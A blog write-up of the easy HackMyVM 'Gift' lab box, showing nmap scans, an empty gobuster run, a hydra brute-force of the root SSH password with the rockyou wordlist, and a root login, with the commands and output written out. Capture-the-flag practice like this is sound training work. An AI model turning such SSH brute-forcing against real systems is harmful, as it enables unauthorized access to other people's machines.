Penetration Testing HackMyVm.eu GIFT box

An extremely Easy box from Hackmyvm.eu

Fast Scan to get host

nmap -sn  192.168.56.1/24
Starting Nmap 7.93 ( https://nmap.org ) at 2023-09-12 13:07 EEST
Nmap scan report for 192.168.56.1
Host is up (0.00044s latency).
MAC Address: 0A:00:27:00:00:00 (Unknown)
Nmap scan report for 192.168.56.100
Host is up (0.00014s latency).
MAC Address: 08:00:27:0C:16:CC (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.102
Host is up (0.00034s latency).
MAC Address: 08:00:27:5B:62:78 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.101
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 28.00 seconds

Great, 192.168.56.102 is our VM ip.

sudo nmap -sS 192.168.56.102 Starting Nmap 7.93 ( https://nmap.org ) at 2023-09-12 13:07 EEST Nmap scan report for 192.168.56.102 Host is up (0.00014s latency). Not shown: 998 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http MAC Address: 08:00:27:5B:62:78 (Oracle VirtualBox virtual NIC)

Going to http://192.168.56.102 results in a basic html page Dont Overthink. Really, Its simple.

Using gobuster didn’t quite result in any findings

gobuster dir --url 192.168.56.102 --wordlist /usr/share/wordlists/dirbuster/directory-list-1.0.txt 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.102
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-1.0.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2023/09/12 13:11:36 Starting gobuster in directory enumeration mode
===============================================================
                                  
===============================================================
2023/09/12 13:11:54 Finished
===============================================================

My next idea was to try and do a further scan on more ports, do use another fuzzing tool (who knows?).. I was pretty puzzled, the only obvious thing to do was to use brute forcing for logging into SSH.

So i decided to try hydra

hydra -l root -P /usr/share/wordlists/rockyou.txt.gz 192.168.56.102 ssh
....
[22][ssh] host: 192.168.56.102   login: root   password: simple
....

Ok, so it was indeed.. simple..

ssh root@192.168.56.102

gift:~# ls
root.txt  user.txt

I’m not going to output the .txt files but.. it was indeed “simple”

It took more time to download and setup the virtualbox environment than everything else.

This should have been something like the bandit exercises from overthewire

Subscribe to my Newsletter

Receive emails about Linux, Programming, Automation, Life tips & Tricks and information about projects I'm working on